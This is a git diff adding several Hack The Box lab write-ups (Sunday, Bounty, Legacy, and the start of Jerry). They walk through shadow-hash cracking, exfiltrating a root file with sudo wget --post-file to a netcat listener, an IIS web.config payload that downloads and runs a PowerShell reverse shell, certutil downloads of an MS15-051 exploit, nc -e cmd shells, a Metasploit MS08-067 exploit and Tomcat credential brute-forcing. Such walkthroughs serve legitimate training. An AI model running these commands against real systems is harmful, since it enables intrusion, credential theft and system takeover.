+ root:x:0:0:Super-User:/root:/usr/bin/bash
+ daemon:x:1:1::/:
+ bin:x:2:2::/usr/bin:
+ sys:x:3:3::/:
+ adm:x:4:4:Admin:/var/adm:
+ lp:x:71:8:Line Printer Admin:/usr/spool/lp:
+ uucp:x:5:5:uucp Admin:/usr/lib/uucp:
+ nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
+ dladm:x:15:3:Datalink Admin:/:
+ smmsp:x:25:25:SendMail Message Submission Program:/:
+ listen:x:37:4:Network Admin:/usr/net/nls:
+ gdm:x:50:50:GDM Reserved UID:/:
+ zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
+ xvm:x:60:60:xVM User:/:
+ mysql:x:70:70:MySQL Reserved UID:/:
+ openldap:x:75:75:OpenLDAP User:/:
+ webservd:x:80:80:WebServer Reserved UID:/:
+ postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
+ svctag:x:95:12:Service Tag UID:/:
+ nobody:x:60001:60001:NFS Anonymous Access User:/:
+ noaccess:x:60002:60002:No Access User:/:
+ nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
+ sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
+ sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
+
+ **sunny@sunday:/export/home/sammy/Desktop$ cat /backup/shadow.backup**
+ mysql:NP:::::::
+ openldap:*LK*:::::::
+ webservd:*LK*:::::::
+ postgres:NP:::::::
+ svctag:*LK*:6445::::::
+ nobody:*LK*:6445::::::
+ noaccess:*LK*:6445::::::
+ nobody4:*LK*:6445::::::
+ sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
+ sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
+
+
+Looking at the results we see that we have a few things to work with. we will be running the unshadow command onto the combination of the passwd.txt and shadow.txt files. First step is to save them locally, and we will run the command afterwards.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → cd _HTB
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB] → cd Sunday
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nano passwd.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nano shadow.backup
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → ls
+ finger-user-enum-1.0 passwd.txt progress.graphml shadow.backup
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → unshadow passwd.txt shadow.backup**
+ Created directory: /home/nihilist/.john
+ root:x:0:0:Super-User:/root:/usr/bin/bash
+ daemon:x:1:1::/:
+ bin:x:2:2::/usr/bin:
+ sys:x:3:3::/:
+ adm:x:4:4:Admin:/var/adm:
+ lp:x:71:8:Line Printer Admin:/usr/spool/lp:
+ uucp:x:5:5:uucp Admin:/usr/lib/uucp:
+ nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
+ dladm:x:15:3:Datalink Admin:/:
+ smmsp:x:25:25:SendMail Message Submission Program:/:
+ listen:x:37:4:Network Admin:/usr/net/nls:
+ gdm:x:50:50:GDM Reserved UID:/:
+ zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
+ xvm:x:60:60:xVM User:/:
+ mysql:NP:70:70:MySQL Reserved UID:/:
+ openldap:*LK*:75:75:OpenLDAP User:/:
+ webservd:*LK*:80:80:WebServer Reserved UID:/:
+ postgres:NP:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
+ svctag:*LK*:95:12:Service Tag UID:/:
+ nobody:*LK*:60001:60001:NFS Anonymous Access User:/:
+ noaccess:*LK*:60002:60002:No Access User:/:
+ nobody4:*LK*:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
+ sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:101:10:sammy:/export/home/sammy:/bin/bash
+ sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:65535:1:sunny:/export/home/sunny:/bin/bash
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → unshadow passwd.txt shadow.backup > john_pwd.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → john john_pwd.txt --wordlist='/usr/share/wordlists/rockyou.txt'**
+
+
+We use the rockyou.txt wordlist in combination with the john command and we find the password "cooldude!" for the sammy user. Using that we try to log in through SSH once more but this time as the sammy user.
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → ssh sammy@10.10.10.76 -p 22022
+ Password:
+ Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4
+ Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
+ sammy@sunday:~$ ls
+ Desktop Documents Downloads Public
+ sammy@sunday:~$ cd Desktop
+ sammy@sunday:~/Desktop$ cat user.txt
+ **a3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+
+And we have been able to ssh as the sammy user ! We have finally been able to reveal the user flag.
+
+## **Part 3 : Getting Root Access**
+
+First of all we run the sudo -l command to see what we can work with.
+
+
+ sammy@sunday:~/Desktop$ sudo -l
+ User sammy may run the following commands on this host:
+ **(root) NOPASSWD: /usr/bin/wget**
+
+
+Interesting ! We seem to be able to run the wget command as root without any password. Let's run the command netcat command on a second terminal , and we will attempt to print out the root flag using wget's --post-file flag.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nc -lvnp **9001**
+
+
+_Terminal 1:_
+
+
+ sammy@sunday:~/Desktop$ **sudo wget --post-file=/root/root.txt 10.10.14.48:9001**
+ --08:49:44-- http://10.10.14.48:9001/
+ => `index.html'
+ Connecting to 10.10.14.48:9001... connected.
+ HTTP request sent, awaiting response...
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → **nc -lvnp 9001**
+ Connection from 10.10.10.76:48117
+ POST / HTTP/1.0
+ User-Agent: Wget/1.10.2
+ Accept:
+ Host: 10.10.14.48:9001
+ Connection: Keep-Alive
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 33
+
+ **fbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/19.md b/Easy/19.md
new file mode 100644
index 0000000..350eb6d
--- /dev/null
+++ b/Easy/19.md
@@ -0,0 +1,389 @@
+# Bounty Writeup
+
+
+
+## Introduction :
+
+Bounty is an easy Windows box that was released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 93.22.134.89 ] [~] → nmap -sC -sV 10.10.10.93
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:23 CET
+ Nmap scan report for 10.10.10.93
+ Host is up (0.095s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 7.5
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: Bounty
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds
+
+
+## **Part 2 : Getting User Access**
+
+It seems like our nmap scan found the 80th port opened, we will run a gobuster scan in order to enumerate the directories we will be able to work with.
+
+
+ λ nihilist [ 93.22.134.89 ] [~] → gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/directory-list-2.3-medium.txt
+
+
+ =====================================================
+ Gobuster v2.0.0 OJ Reeves (@TheColonial)
+ =====================================================
+ [+] Mode : dir
+ [+] Url/Domain : http://10.10.10.93/
+ [+] Threads : 50
+ [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes : 200,204,301,302,307,403
+ [+] Extensions : aspx
+ [+] Timeout : 10s
+ =====================================================
+ 2019/11/25 08:28:36 Starting gobuster
+ =====================================================
+ /transfer.aspx (Status: 200)
+ /uploadedFiles (Status: 301)
+
+
+Gobuster seems to have found 2 interesting pages : -/transfer.aspx (which returns a status 200) -/uploadedfiles (which returns a status 301)
+
+ 
+
+Searching for the keywords **"IIS 7.5 RCE"** , the results tell us that we should be able to upload a file **web.config**
+
+We will submit our script to the website and ready our terminal running the command nc with the -lvnp flags in order to catch the incoming connection to our 9001 port.
+
+_web.config:_
+
+
+ <****?xml version="1.0" encoding="UTF-8"?> <****configuration> <****system.webServer> <****handlers accessPolicy="Read, Script, Write"> <****add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> <****/handlers> <****security> <****requestFiltering> <****fileExtensions> <****remove fileExtension=".config" /> <****hiddenSegments> <****/fileExtensions> <****remove segment="web.config" /> <****/hiddenSegments> <****/requestFiltering> <****/security> <****/system.webServer> <****/configuration> <****%@ Language=VBScript %> <****%
+ Set s = CreateObject("WScript.Shell")
+ Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('ht>
+ o = cmd.StdOut.Readall()
+ Response.write(o)
+ %****>****
+
+Our nihilist.ps1 script is a copy of Nishang's [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → curl -sk https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > nihilist.ps1
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.48 -Port 9001' >> nihilist.ps1
+
+
+As it is written above, our nihilist.ps1 script will attempt to send a reverse shell connection to our machine at the of 10.10.14.48 adress, onto it's 9001st port. So we will ready our terminal with the nc command and it's -lvnp flags in order to catch the incoming connection.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → nc -lvnp 9001
+
+
+We submit our web.config file
+
+
+
+We then browse to it, and then we wait for the reverse shell to come back to our terminal.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → python2 -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9001
+
+
+_Terminal 3:_
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → curl -vsk http://10.10.10.93/UploadedFiles/web.config
+ * Trying 10.10.10.93:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
+ > GET /UploadedFiles/web.config HTTP/1.1
+ > Host: 10.10.10.93
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → python2 -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+ 10.10.10.93 - - [02/Dec/2019 08:22:36] "GET /nihilist.ps1 HTTP/1.1" 200 -
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9001
+ Connection from 10.10.10.93:49158
+ Windows PowerShell running as user BOUNTY$ on BOUNTY
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\windows\system32\inetsrv>
+
+ PS C:\windows\system32\inetsrv> whoami
+ bounty\merlin
+
+
+And we're in ! we are logged in as the user merlin, now let's grab the user flag located in C:\users\merlin\desktop
+
+
+
+
+ PS C:\windows\system32\inetsrv> cd ../../..
+ PS C:\> ls
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d---- 5/30/2018 4:14 AM inetpub
+ d---- 7/14/2009 6:20 AM PerfLogs
+ d-r-- 6/10/2018 3:43 PM Program Files
+ d-r-- 7/14/2009 8:06 AM Program Files (x86)
+ d-r-- 5/31/2018 12:18 AM Users
+ d---- 5/31/2018 11:37 AM Windows
+
+
+ PS C:\> cd Users\Merlin
+ PS C:\Users\Merlin> cd Desktop
+ PS C:\Users\Merlin\Desktop> more user.txt
+ e2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Part 3 : Getting Root Access**
+
+In order to escalate privileges from merlin to the SYSTEM user, we need to first look at the results of the systeminfo command.
+
+_Terminal 1:_
+
+
+ PS C:\Users> systeminfo
+
+ Host Name: BOUNTY
+ OS Name: Microsoft Windows Server 2008 R2 Datacenter
+ OS Version: 6.1.7600 N/A Build 7600
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 55041-402-3606965-84760
+ Original Install Date: 5/30/2018, 12:22:24 AM
+ System Boot Time: 12/2/2019, 8:56:08 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,588 MB
+ Virtual Memory: Max Size: 4,095 MB
+ Virtual Memory: Available: 3,595 MB
+ Virtual Memory: In Use: 500 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ Hotfix(s): N/A
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.93
+
+
+
+We see that there are no Hotfixes onto the machine, which indicates a serious security flaw. So we will attempt to escalate privileges using the MS15-051. we will not forget that we will be applying a privilege escalation binary onto a 64 bit machine.
+
+Download from https://eternallybored.org/misc/netcat/
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → wget https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
+ --2019-12-02 09:07:00-- https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.118.3
+ Connecting to github.com (github.com)|140.82.118.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe [following]
+ --2019-12-02 09:07:00-- https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 55296 (54K) [application/octet-stream]
+ Saving to: ‘ms15-051.exe’
+
+ ms15-051.exe 100%[===============================>] 54.00K --.-KB/s in 0.06s
+
+ 2019-12-02 09:07:01 (852 KB/s) - ‘ms15-051.exe’ saved [55296/55296]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → python2 -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+
+
+
+Now we just need to download both the ms15-051.exe and nc.exe binary onto our local machine, at the IP 10.10.14.48 at the 8000th port.
+
+_Terminal 1:_
+
+
+ PS C:\Users> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
+ **** Online ****
+ CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5)
+ CertUtil: Access is denied.
+
+
+Let's not forget to download it onto the machine within a folder where we have the write rights.
+
+
+ PS C:\Users> cd ..
+ PS C:\> cd Windows
+ PS C:\Windows> cd temp
+
+
+Now we should be able to download our 2 binaries
+
+
+ PS C:\Windows\temp> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
+ **** Online ****
+ CertUtil: -URLCache command completed successfully.
+
+
+
+ PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
+ **** Online ****
+ CertUtil: -URLCache command completed successfully.
+
+
+Our binaries got uploaded ! now before we execute it we will ready our reverse shell terminal with the same nc command to catch the incoming connection.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9999
+
+
+_Terminal 1:_
+
+
+ PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
+ **** Online ****
+ CertUtil: -URLCache command completed successfully.
+ PS C:\windows\temp> ls
+
+
+ Directory: C:\windows\temp
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d---- 6/10/2018 3:44 PM vmware-SYSTEM
+ -a--- 5/30/2018 3:19 AM 0 DMI5FAC.tmp
+ -a--- 12/2/2019 10:12 AM 55296 nihilist_privesc.exe
+ -a--- 12/2/2019 11:02 AM 43696 nc64.exe
+ -a--- 6/10/2018 3:44 PM 203777 vminst.log
+ -a--- 12/2/2019 8:56 AM 57269 vmware-vmsvc.log
+ -a--- 6/11/2018 12:47 AM 22447 vmware-vmusr.log
+ -a--- 12/2/2019 8:56 AM 910 vmware-vmvss.log
+
+
+ PS C:\windows\temp> ./nihilist_privesc.exe "c:\windows\temp\nc64.exe -e cmd 10.10.14.48 9999"
+
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9999
+
+ Connection from 10.10.10.93:49189
+ Microsoft Windows [Version 6.1.7600]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+
+ C:\windows\temp>whoami
+ whoami
+ nt authority\system
+
+ C:\windows\temp>cd ..
+ cd ..
+
+ C:\Windows>cd ..
+ cd ..
+
+ C:\>cd Users
+ cd Users
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 5084-30B0
+
+ Directory of C:\Users
+
+ 05/30/2018 11:18 PM <****DIR> .
+ 05/30/2018 11:18 PM <****DIR> ..
+ 05/30/2018 11:18 PM <****DIR> Administrator
+ 05/30/2018 03:44 AM <****DIR> Classic .NET AppPool
+ 05/29/2018 11:22 PM <****DIR> merlin
+ 05/30/2018 04:44 AM <****DIR> Public
+ 0 File(s) 0 bytes
+ 6 Dir(s) 11,884,384,256 bytes free
+
+ C:\Users>cd Administrator
+ cd Administrator
+
+ C:\Users\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to get a root shell onto the box and we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/2.md b/Easy/2.md
new file mode 100644
index 0000000..f8dbca2
--- /dev/null
+++ b/Easy/2.md
@@ -0,0 +1,139 @@
+# Legacy Writeup
+
+
+
+## Introduction :
+
+Legacy is an easy Windows box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [/home/nihilist] → nmap -sC -sV 10.10.10.4
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-08 22:10 CET
+ Nmap scan report for 10.10.10.4
+ Host is up (0.044s latency).
+ Not shown: 997 filtered ports
+ PORT STATE SERVICE VERSION
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows XP microsoft-ds
+ 3389/tcp closed ms-wbt-server
+ Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
+
+ Host script results:
+ |_clock-skew: mean: 5d00h59m39s, deviation: 1h24m50s, median: 4d23h59m39s
+ |_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:25:bd (VMware)
+ | smb-os-discovery:
+ | OS: Windows XP (Windows 2000 LAN Manager)
+ | OS CPE: cpe:/o:microsoft:windows_xp::-
+ | Computer name: legacy
+ | NetBIOS computer name: LEGACY\x00
+ | Workgroup: HTB\x00
+ |_ System time: 2019-11-14T01:10:09+02:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ |_smb2-time: Protocol negotiation failed (SMB2)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 63.05 seconds
+
+
+Here we can see that the port 139, 445, and 3389 are opened. We will take a closer look at the port****running the service****.
+
+## **Part 2 : Getting Access**
+
+It is highly likely that the machine is vulnerable to MS08-067 RCE so we will test it with the according metasploit module.
+
+
+ msf5 > search ms08
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/admin/ms/ms08_059_his2006 2008-10-14 normal No Microsoft Host Integration Server 2006 Command Execution Vulnerability
+ 1 auxiliary/fileformat/multidrop normal No Windows SMB Multi Dropper
+ 2 exploit/windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
+ 3 exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
+ 4 exploit/windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
+ 5 exploit/windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption
+ 6 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
+ 7 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
+
+
+ msf5 > use exploit/windows/smb/ms08_067_netapi
+ msf5 exploit(windows/smb/ms08_067_netapi) > show options
+
+ Module options (exploit/windows/smb/ms08_067_netapi):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 445 yes The SMB service port (TCP)
+ SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic Targeting
+
+
+
+The module ms08_067_netapi requires us to set the above-mentionned options : RHOSTS and RPORT.
+
+
+ msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
+ RHOSTS => 10.10.10.4
+ msf5 exploit(windows/smb/ms08_067_netapi) > run
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] 10.10.10.4:445 - Automatically detecting the target...
+ [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
+ [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
+ [*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
+ [*] Sending stage (180291 bytes) to 10.10.10.4
+ [*] Meterpreter session 2 opened (10.10.14.48:4444 -> 10.10.10.4:1032) at 2019-11-09 11:20:27 +0100
+
+ meterpreter > pwd
+ C:\WINDOWS\system32
+ meterpreter > getuid
+ Server username: NT AUTHORITY\SYSTEM
+
+
+
+the metasploit module was successful, it gave us a meterpreter shell with elevated privileges.
+
+## **Part 3 : The Root Access**
+
+All we need to do now is simply grab the user and root flags.
+
+
+ meterpreter > cd Documents\ and\ Settings
+ meterpreter > cd john
+ meterpreter > cd Desktop
+ meterpreter > cat user.txt
+ e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ meterpreter > cd ../../..
+
+ meterpreter > cd Documents\ and\ Settings
+ meterpreter > cd Administrator
+ meterpreter > cd Desktop
+ meterpreter > cat root.txt
+ 99XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/20.md b/Easy/20.md
new file mode 100644
index 0000000..a0b4451
--- /dev/null
+++ b/Easy/20.md
@@ -0,0 +1,307 @@
+# Jerry Writeup
+
+
+
+## Introduction :
+
+Jerry is an easy Windows box that was released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sC -sV 10.10.10.95 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-28 08:45 CET
+ Nmap scan report for 10.10.10.95
+ Host is up (0.079s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
+ |_http-favicon: Apache Tomcat
+ |_http-open-proxy: Proxy might be redirecting requests
+ |_http-server-header: Apache-Coyote/1.1
+ |_http-title: Apache Tomcat/7.0.88
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 24.10 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up a tomcat apache webpage. Let's fire up our metasploit console using the tomcat_mgr_login auxiliary module in order to test if the machine has been left off with default credentials.
+
+
+ msf5 > use auxiliary/scanner/http/tomcat_mgr_login
+
+ msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
+
+ Module options (auxiliary/scanner/http/tomcat_mgr_login):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ BLANK_PASSWORDS false no Try blank passwords for all users
+ BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
+ DB_ALL_CREDS false no Try each user/password couple stored in the current database
+ DB_ALL_PASS false no Add all passwords in the current database to the list
+ DB_ALL_USERS false no Add all users in the current database to the list
+ PASSWORD no The HTTP password to specify for authentication
+ PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 8080 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
+ TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
+ THREADS 1 yes The number of concurrent threads (max one per host)
+ USERNAME no The HTTP username to specify for authentication
+ USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
+ USER_AS_PASS false no Try the username as the password for all users
+ USER_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
+ VERBOSE true yes Whether to print output for all attempts
+ VHOST no HTTP server virtual host
+
+
+Seems like we only need to set the RHOSTS parameters and the scanner should be running.
+
+
+ msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.10.10.95
+ RHOSTS => 10.10.10.95
+ msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
+
+ [!] No active DB -- Credential data will not be saved!
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
